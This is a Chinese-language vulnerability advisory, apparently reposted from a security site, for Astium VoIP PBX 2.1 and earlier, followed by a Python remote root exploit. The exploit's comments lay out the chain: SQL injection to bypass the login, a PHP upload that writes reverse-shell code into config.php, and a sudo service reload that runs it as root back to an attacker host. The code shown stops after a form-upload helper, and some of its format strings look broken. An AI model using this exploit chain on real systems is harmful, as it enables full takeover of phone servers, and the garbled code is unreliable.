Astium PBX 'logon.php'SQL注入等多个安全漏洞

发布日期:2013-01-02
更新日期:2013-01-05

受影响系统:
Astium Astium VoIP PBX <= v2.1 build 25399
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57097
 
Astium是网络电话交换机。
 
Astium PBX 2.1及更早版本存在多个安全漏洞,这些安全漏洞导致攻击者可通过SQL注入绕过登录页面的身份验证,以管理员身份访问,进而上传并执行PHP脚本。
 
<*来源:xistence (xistence@0x90.nl)
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
xistence (xistence@0x90.nl)提供了如下测试方法:
 
#!/usr/bin/python
 #+--------------------------------------------------------------------------------------------------------------------------------+
 # Exploit Title    : Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit
 # Date              : 01-02-2012
 # Author            : xistence (xistence<[AT]>0x90.nl)
 # Software link    : ?lang=en
 # Vendor site      :
 # Version          : v2.1 build 25399
 # Tested on        : CentOS 5.x 32-bit
 #

# Vulnerability    : Astium is prone to multiple vulnerabilities. This exploit will use SQL injection to bypass authentication on the
 # login page and get access as an administrator. After that it will upload and execute a PHP script which will modify the
 # "/usr/local/astium/web/php/config.php" script with our reverse shell php code and run a
 # "sudo /sbin/service astcfgd reload" (Apache user is allowed to restart this service through sudo).
 # The service reload will cause the added code in "/usr/local/astium/web/php/config.php" to be executed as root and thus resulting in
 # a reverse shell with root privileges.
 # Code in "/usr/local/astium/web/php/config.php" is also removed again, else the web interface will stop functioning!
 #
 # Vendor has been contacted several times since 8-22-2011(!) and promised to fix the issue, but until now hasn't resolved the issue.
 #
 #+--------------------------------------------------------------------------------------------------------------------------------+
 import urllib, urllib2, cookielib
 import sys
 import random
 import mimetools
 import mimetypes
 from cStringIO import StringIO
 import itertools

print "[*] Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit - xistence - xistence[at]0x90[.]nl - 2013-01-02"
 if (len(sys.argv) != 4):
    print "[*] Usage: " + sys.argv[0] + " <RHOST> <LHOST> <LPORT>"
    exit(0)
 
 rhost = sys.argv[1]
 lhost = sys.argv[2]
 lport = sys.argv[3]

class MultiPartForm(object):
    """Accumulate the data to be used when posting a form."""

def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
     
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

def add_field(self, name, value):
        """Add a simple field to the form data."""
        self.form_fields.append((name, value))
        return

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        """Add a file to be uploaded."""
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
     
    def __str__(self):
        """Return a string representing the form data, including attached files."""
        # Build a list of lists, each containing "lines" of the
        # request.  Each part is separated by a boundary string.
        # Once the list is built, return a string where each
        # line is separated by '\r\n'.
        parts = []
        part_boundary = '--' + self.boundary
         
        # Add the form fields
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data;' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
         
        # Add the files to upload
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file;; filename="%s"' % \
                  (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
         
        # Flatten the list and add closing boundary marker,
        # then return CR+LF separated data
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygzpz.html